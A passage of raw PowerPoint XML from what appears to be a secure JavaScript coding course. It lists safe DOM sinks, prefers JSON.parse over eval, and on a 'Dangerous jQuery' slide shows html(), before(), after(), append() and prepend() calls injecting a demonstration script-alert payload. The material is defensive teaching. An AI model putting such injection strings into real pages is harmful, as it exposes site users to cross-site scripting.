              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>safeName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>formfield.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.createTextNode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = DOMPurify.sanitize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3218112"/>
            <a:ext cx="2630028" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe JSON Parsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185646" y="3206653"/>
            <a:ext cx="5958242" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="4572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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>() (rather than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="903894" y="3810501"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="Group 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Oval 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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39" name="TextBox 38"/>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OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2785126" y="3810501"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Oval 49"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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49" name="TextBox 48"/>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OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4666358" y="3810501"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="Group 52"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Oval 54"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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54" name="TextBox 53"/>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OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="Group 56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6547589" y="3810501"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 57"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="60" name="Oval 59"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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59" name="TextBox 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6714321" y="1088298"/>
              <a:ext cx="1716797" cy="492443"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="723595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 presetClass="entr" presetSubtype="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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="2" presetClass="entr" presetSubtype="1"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ppt_x"/>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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="2" presetClass="entr" presetSubtype="1"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additive="base">
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="54" presetID="2" presetClass="entr" presetSubtype="1"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>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Dangerous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2075780"/>
            <a:ext cx="8229600" cy="2522679"/>
            <a:chOff x="457200" y="3156326"/>
            <a:chExt cx="8229600" cy="2522679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Picture 30" descr="codewindow.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="556" r="-556"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3156326"/>
              <a:ext cx="8229600" cy="2522679"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="834192" y="3269620"/>
              <a:ext cx="7628696" cy="2353465"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="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457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>$('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>').html('&lt;script&gt;alert("Hi!");&lt;/script&gt;');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>$('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>').before('&lt;script&gt;alert("Hi!");&lt;/script&gt;');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>$('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>').after('&lt;script&gt;alert("Hi!");&lt;/script&gt;');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>$('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>').append('&lt;script&gt;alert("Hi!");&lt;/script&gt;');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>$('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>').prepend('&lt;script&gt;alert("Hi!");&lt;/script&gt;');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
